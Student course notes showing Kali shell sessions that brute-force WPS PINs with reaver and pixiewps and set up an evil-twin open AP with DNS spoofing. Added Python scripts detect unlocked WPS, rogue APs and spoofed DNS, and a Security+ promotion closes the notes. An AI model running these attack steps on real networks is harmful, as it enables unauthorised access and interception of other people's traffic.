WPS and other tools
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
Run the two commands above first, then map the wireless card into the virtual machine; remember this order.
root@kali:~# ifconfig // the card is not visible
root@kali:~# ifconfig -a // you must run ifconfig -a to see the card
root@kali:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1672 avahi-daemon
1673 avahi-daemon
PHY Interface Driver Chipset
phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11
(mac80211 monitor mode vif enabled for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
root@kali:~# iwconfig
eth0 no wireless extensions.
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
root@kali:~# wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
root@kali:~# wash -i wlan2mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A 1 00 1.0 No ziroom222
0C:82:68:5E:76:20 1 00 1.0 No letv
14:75:90:21:4F:56 6 00 1.0 No TP-LINK_4F56
5C:63:BF:F9:74:0C 6 00 1.0 No TP-DO3234
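The wash table above is also what a network owner should be reading, because an AP that shows "WPS Locked: No" is exactly the one the later reaver runs depend on, and the fix is simply to disable WPS on it. The following Python script is an added example, not part of these course notes: it parses wash output in the format shown above and audits it against an inventory of the APs you operate, reporting your own APs that still answer WPS registrations and any foreign BSSID that is beaconing one of your ESSIDs. The inventory dictionary and the 02:00:00:00:00:01 row in the sample are constructed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Matches one data row of `wash` output:
#   BSSID  Channel  RSSI  WPS Version  WPS Locked  ESSID
# ESSIDs may contain spaces, so everything after the lock flag is the name.
WASH_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+(?P<rssi>-?\d+)\s+(?P<version>\S+)\s+"
    r"(?P<locked>Yes|No)\s*(?P<essid>.*)$"
)


@dataclass(frozen=True)
class WpsEntry:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str


def parse_wash(text: str) -> list[WpsEntry]:
    """Parse the table that wash prints; banner, header and rule lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = WASH_ROW.match(line.strip())
        if not m:
            continue
        entries.append(WpsEntry(
            bssid=m["bssid"].upper(),
            channel=int(m["channel"]),
            rssi=int(m["rssi"]),
            wps_version=m["version"],
            locked=(m["locked"] == "Yes"),
            essid=m["essid"].strip(),
        ))
    return entries


def audit_wps(entries, managed: dict[str, str]) -> list[tuple[str, str, str]]:
    """Compare a scan against an inventory {BSSID: ESSID} of the APs you own.

    Returns (bssid, essid, reason) tuples:
      wps-unlocked       one of your APs still accepts WPS registrations;
                         the mitigation is to disable WPS on that AP
      unmanaged-ap-ssid  a BSSID you do not own is beaconing one of your ESSIDs
    """
    managed = {b.upper(): e for b, e in managed.items()}
    own_essids = set(managed.values())
    findings = []
    for e in entries:
        if e.bssid in managed and not e.locked:
            findings.append((e.bssid, e.essid, "wps-unlocked"))
        elif e.bssid not in managed and e.essid in own_essids:
            findings.append((e.bssid, e.essid, "unmanaged-ap-ssid"))
    return findings


# Constructed sample in the format shown on this page; the last row uses an
# invented, locally administered (02:...) BSSID to exercise the second rule.
SAMPLE_WASH = """\
Wash v1.5.2 WiFi Protected Setup Scan Tool

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
----------------------------------------------------------------
D0:C7:C0:99:ED:3A    1       00    1.0          No          ziroom222
14:75:90:21:4F:56    6       00    1.0          No          TP-LINK_4F56
5C:63:BF:F9:74:0C    6       00    1.0          Yes         TP-D03234
02:00:00:00:00:01    6       00    1.0          No          TP-LINK_4F56
"""

# Hypothetical inventory of the APs the defender operates.
MANAGED_APS = {"14:75:90:21:4F:56": "TP-LINK_4F56", "5C:63:BF:F9:74:0C": "TP-D03234"}

if __name__ == "__main__":
    for bssid, essid, reason in audit_wps(parse_wash(SAMPLE_WASH), MANAGED_APS):
        print(f"{reason:18} {bssid}  {essid}")
```

Feed it a saved scan (`wash -i wlan2mon -o scan.txt`, then read the file) on a schedule and alert on any finding; a "wps-unlocked" result on your own hardware means the PIN brute force that follows in these notes is still possible against it.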
root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1
root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv // start trying the 11,000 PIN codes
root@kali:~# pixiewps
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Not all required arguments have been supplied!
root@kali:~# pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
╋━━━━━━━━━━━━╋
┃EVIL TWIN AP / ROGUE AP ┃
┃ Other tools ┃
╋━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃Piggybacking on Wi-Fi, and being piggybacked ┃
┃20% of public-place wireless networks in Beijing, Shanghai and Guangzhou are fake ┃
╋━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon ┃
┃apt-get install bridge-utils ┃ install the bridge utilities
┃brctl addbr bridge ┃
┃brctl addif Wifi-Bridge eth0 ┃
┃brctl addif Wifi-Bridge at0 ┃
┃ifconfig eth0 0.0.0.0 up ┃
┃ifconfig at0 0.0.0.0 up ┃
┃ifconfig bridge 192.168.1.10 up ┃
┃route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
root@kali:~# airodump-ng wlan2mon
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
00:1E:58:0A:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
80:89:17:15:86:28 -90 9 0 0 11 54e. WPA2 CCMP PSK TP-D03235
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:21:4F:56 E8:3E:B6:1B:19:32 -64 0 -l1e 0 1
14:75:90:21:4F:56 90:3C:92:BA:00:CC -77 0G-11 0 7
14:75:90:21:4F:56 18:DC:56:F0:26:9F -84 0 -1 0 1
root@kali:~# airbase-ng -c 11 --essid kifi-free wlan2mon // fake a wifi-free wireless network
21:12:36 Created tap interface at0
21:12:36 Trying to set MTU on at0 to 1500
21:12:36 Trying to set MTU on wlan2mon to 1800
21:12:37 Access Point with BSSID 08:57:00:0C:96 started
root@kali:~# ifconfig -a // the fake at0 interface has appeared
root@kali:~# airodump-ng wlan2mon // sniff again: the wifi-free wireless network has appeared
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:58:0A:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e OPN
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 64:09:80:24:A2:C9 -93 0 - 1 0 3 leon
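Read from the defender's side, the two airodump-ng listings above show how the rogue AP gives itself away in an ordinary survey: the same BSSID (EC:26:CA:DC:29:B6) now appears once as OPN and once as WPA2, and an open network is being broadcast with a name derived from a real one. The following Python script is an added example, not part of these course notes: it parses airodump-ng AP rows and applies three such checks against an allow-list of the ESSID/BSSID pairs the defender operates. The allow-list and the 02:00:00:00:00:01 row in the sample are constructed; the other rows are taken from the listings above.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# One AP row from the top table of airodump-ng:
#   BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER  AUTH  ESSID
# Station rows (two MACs in a row) and header lines do not match because
# the second field has to be the numeric PWR value.
AP_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<pwr>-?\d+)\s+"
    r"(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<ps>\d+)\s+(?P<ch>\d+)\s+"
    r"(?P<mb>\S+)\s+(?P<enc>\S+)\s*(?P<rest>.*)$"
)


@dataclass(frozen=True)
class ApRow:
    bssid: str
    pwr: int
    channel: int
    enc: str
    cipher: str
    auth: str
    essid: str


def parse_airodump(text: str) -> list[ApRow]:
    rows = []
    for line in text.splitlines():
        m = AP_ROW.match(line.strip())
        if not m:
            continue
        rest = m["rest"].strip()
        if m["enc"] == "OPN":
            # open networks print empty CIPHER/AUTH columns, so the rest is the name
            cipher, auth, essid = "", "", rest
        else:
            parts = rest.split(None, 2) + ["", "", ""]
            cipher, auth, essid = parts[0], parts[1], parts[2]
        rows.append(ApRow(m["bssid"].upper(), int(m["pwr"]), int(m["ch"]),
                          m["enc"], cipher, auth, essid.strip()))
    return rows


def detect_rogues(rows, known: dict[str, set[str]]) -> list[tuple[str, str, str]]:
    """known maps each ESSID you operate to the BSSIDs allowed to beacon it.

    Findings are (bssid, essid, reason):
      unknown-bssid-for-managed-ssid  someone else is beaconing your ESSID
      bssid-security-mismatch         one BSSID seen with two security configs
      lookalike-open-ssid             an open network whose name extends one
                                      of yours, e.g. "<ssid>-free"
    """
    findings = []
    for r in rows:
        if r.essid in known and r.bssid not in known[r.essid]:
            findings.append((r.bssid, r.essid, "unknown-bssid-for-managed-ssid"))
    enc_by_bssid = defaultdict(set)
    for r in rows:
        enc_by_bssid[r.bssid].add(r.enc)
    for bssid, encs in enc_by_bssid.items():
        if len(encs) > 1:
            findings.append((bssid, "", "bssid-security-mismatch"))
    for r in rows:
        lookalike = r.essid and r.essid not in known and any(
            r.essid.lower().startswith(k.lower()) for k in known)
        if r.enc == "OPN" and lookalike:
            findings.append((r.bssid, r.essid, "lookalike-open-ssid"))
    return findings


# Constructed sample: rows from the listings on this page plus one invented
# locally administered BSSID (02:...) beaconing the lookalike open name.
SAMPLE_AIRODUMP = """\
 CH  1 ][ Elapsed: 3 mins ][ 2015-11-18 21:11
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 EC:26:CA:DC:29:B6  -32      190        0    0  11  54e  OPN              kifi-free
 EC:26:CA:DC:29:B6  -32      190        0    0  11  54e. WPA2 TKIP   MGT  kifi
 14:75:90:21:4F:56  -47      114        5    0   6  54e. WPA2 CCMP   PSK  TP-LINK_4F56
 02:00:00:00:00:01  -40      150        0    0  11  54e  OPN              kifi-free
 D0:C7:C0:99:ED:3A  -69       94        8    0   1  54e  WPA2 CCMP   PSK  ziroom222
 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 14:75:90:21:4F:56  E8:3E:B6:1B:19:32  -64    0 - 1     0       1
 (not associated)   64:09:80:24:A2:C9  -93    0 - 1     0       3  leon
"""

# Hypothetical allow-list: ESSID -> BSSIDs that legitimately beacon it.
KNOWN_NETWORKS = {"kifi": {"EC:26:CA:DC:29:B6"}, "TP-LINK_4F56": {"14:75:90:21:4F:56"}}

if __name__ == "__main__":
    for bssid, essid, reason in detect_rogues(parse_airodump(SAMPLE_AIRODUMP), KNOWN_NETWORKS):
        print(f"{reason:32} {bssid}  {essid}")
```

The mismatch rule is the strongest signal: a legitimate multi-AP deployment can reuse an ESSID across several BSSIDs, but one BSSID never legitimately advertises two different security configurations within the same survey. Run it against `airodump-ng -w` CSV or text captures from a fixed sensor and alert on the first two reasons; the lookalike rule is best used to drive user warnings.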
root@kali:~# apt-get install bridge-utils // install the bridge utilities
root@kali:~# brctl
Usage: brctl [commands]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
hairpin <bridge> <port> {on|off} turn hairpin on/off
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show [ <bridge> ] show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> {on|off} turn stp on/off
root@kali:~# brctl addbr bridge
root@kali:~# brctl addif bridge eth0
root@kali:~# dhclient eth0
Job for smbd.service failed. See 'systemctl status smbd.service' and 'journalctl -xn' for details.
invoke-rc.d: initscript smbd, action "reload" failed.
root@kali:~# brctl addif bridge eth0
root@kali:~# brctl addif bridge at0
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
root@kali:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
root@kali:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
╋━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃echo 1 > /proc/sys/net/ipv4/ip_forward┃
┃dnsspoof -i bridge -f dnsspoof.hosts ┃
┃ /usr/share/dsniff/dnsspoof.hosts ┃
┃apache2ctl start ┃
╋━━━━━━━━━━━━━━━━━━━╋
root@kali:~# vi /proc/sys/net/ipv4/ip_forward
It will not let you edit the file!
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Change the 0 to 1 and routing (IP forwarding) is switched on!
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
root@kali:~# dnsspoof -i bridge -f dnsspoof.hosts
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root@kali:~# cat /usr/share/dsniff/dnsspoof.hosts
root@kali:~# vi host
root@kali:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]
root@kali:~# apache
apache2 apache2ctl apachectl apache-users
root@kali:~# apache2ctl start
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
root@kali:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2
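The dnsspoof step above works because clients behind the bridge accept whatever answer reaches them first on UDP port 53, and the hosts file redirects every listed name to the same local web server. The following Python script is an added example, not part of these course notes, showing the client-side detection a defender can run against that situation: it compares answers received on the local segment with answers from an out-of-band resolver (for instance one reached over DNS-over-TLS, or a recorded baseline), flags public names that resolve into private address space, and flags a single local address that several unrelated public names suddenly share, which is the signature of a hosts file with a wildcard entry. The resolver answers, the internal domain suffix and all addresses in the sample are constructed (public ones from the RFC 5737 documentation ranges).

```python
from __future__ import annotations

import ipaddress
from collections import defaultdict

# Ranges a public hostname should never resolve into from inside a network:
# RFC 1918 private space, loopback and link-local (IPv4 and IPv6).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_local_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # membership test between an IPv4 address and an IPv6 network is simply False
    return any(addr in net for net in LOCAL_NETS)


def is_internal_name(name: str, internal_suffixes) -> bool:
    """Names under your own internal zones are expected to resolve to local addresses."""
    n = name.lower().rstrip(".")
    return any(n == s.lstrip(".") or n.endswith(s) for s in internal_suffixes)


def find_spoofing(local, reference, internal_suffixes, min_shared=2):
    """local / reference are {qname: [answer_ip, ...]} from the two resolvers.

    Findings are (name_or_ip, reason, detail):
      local-address-for-public-name  a public name was answered with a private
                                     or link-local address
      differs-from-reference         the in-band answer disagrees with the
                                     out-of-band resolver
      shared-sinkhole-address        at least min_shared public names all point
                                     at one local address
    """
    findings = []
    names_by_local_ip = defaultdict(set)
    for name, answers in local.items():
        internal = is_internal_name(name, internal_suffixes)
        for ip in answers:
            if is_local_address(ip) and not internal:
                findings.append((name, "local-address-for-public-name", ip))
                names_by_local_ip[ip].add(name)
        ref = reference.get(name)
        if ref is not None and set(answers) != set(ref):
            findings.append((name, "differs-from-reference", ",".join(sorted(ref))))
    for ip, names in names_by_local_ip.items():
        if len(names) >= min_shared:
            findings.append((ip, "shared-sinkhole-address", ",".join(sorted(names))))
    return findings


# Constructed sample: answers a client on the bridged segment received ("local")
# next to the same names resolved out of band ("reference"). The 10.1.1.x
# addresses mirror the bridge subnet used in the session above.
SAMPLE_LOCAL = {
    "www.example.com": ["10.1.1.10"],
    "login.example.net": ["10.1.1.10"],
    "intranet.corp.example": ["10.1.1.5"],
    "cdn.example.org": ["203.0.113.7"],
}
SAMPLE_REFERENCE = {
    "www.example.com": ["198.51.100.20"],
    "login.example.net": ["198.51.100.21"],
    "intranet.corp.example": ["10.1.1.5"],
    "cdn.example.org": ["203.0.113.7"],
}
# Hypothetical internal zone whose names legitimately resolve to private space.
INTERNAL_SUFFIXES = (".corp.example",)

if __name__ == "__main__":
    for subject, reason, detail in find_spoofing(SAMPLE_LOCAL, SAMPLE_REFERENCE, INTERNAL_SUFFIXES):
        print(f"{reason:30} {subject:24} {detail}")
```

The "differs-from-reference" check needs an out-of-band channel the rogue gateway cannot rewrite, which is the same reason encrypted DNS and HSTS-pinned TLS defeat this setup on the client: a forged A record for login.example.net still cannot produce a valid certificate for it.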
These notes were taken by a student of the Aqniu Classroom (安全牛課堂); to see this course or other information-security material, head over to the Aqniu Classroom.
Why is the Security+ certification the hottest certification of the Internet+ era?
First, Niumei (牛妹) introduces Security+.
Security+ is a vendor-neutral third-party certification issued by CompTIA, the Computing Technology Industry Association of the United States. Together with CISSP, ITIL and others it counts among the ten most popular international IT certifications; compared with CISSP, which leans toward information-security management, Security+ leans toward information-security technology and operations.
Passing the certification demonstrates your abilities in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is not easy and the credential carries real weight, it is now widely adopted by enterprises and security professionals around the world.
Why is the Security+ certification so hot?
Reason one: among all information-security certifications, those focused on security technology are a blank spot, and Security+ fills exactly that gap.
The information-security certifications currently recognised in the industry are mainly CISP and CISSP, but both lean toward security management; technical knowledge is covered broadly and shallowly, and the exams skim over it. Moreover, CISSP requires more than five years of information-security work experience, and CISP requires a junior-college degree plus more than four years of work experience; these requirements block the path to certification for capable and ambitious young people. In the real world, whether you are job-hunting, seeking a promotion or a raise, or listing staff on a bid, certifications are indispensable, which is very unfair to young people. Security+ can clear these obstacles from young people's career development: because it leans toward security technology, it has no particular work-experience requirement. As long as you have an IT-related background and want to get ahead, you can study for and sit the exam.
Reason two: a tool for IT operations staff to do their jobs and to change their fortunes.
In banking, securities, insurance, information and communications and other industries there are a great many IT operations staff, and operations work covers a very wide area: it is a comprehensive technical role spanning networks, systems, security, application architecture and storage. It may lack the tragic heroism of the programmers' "live a bachelor, die writing code", but it has its own lament of "hoeing under the noon sun is nothing next to the hardship of ops". Facing computers and machines every day, over time one inevitably feels lost and confused about career development. The Security+ international certification lets ambitious IT operations staff learn network-security knowledge and master network-security practice, steering their careers toward network security and helping to relieve the domestic shortage of information-security talent. And even without changing track, to do operations work well, learning security and obtaining a security certification is indispensable.
Reason three: down to earth, international, convenient to take, and reasonably priced!
CompTIA, as the most influential leading global organisation in the ICT field, is professional, fair and impartial in certifying information-security talent. Security+ leans toward hands-on work and is closely tied to the daily work of front-line engineers, making it suitable for IT staff at banks, securities firms, insurers, Internet companies and the like. As an international certification it is widely recognised in 147 countries around the world.
In the current wave of information security, talent is the key to its development, and domestic information-security talent is in very short supply; we believe Security+ is sure to become the hottest information-security certification.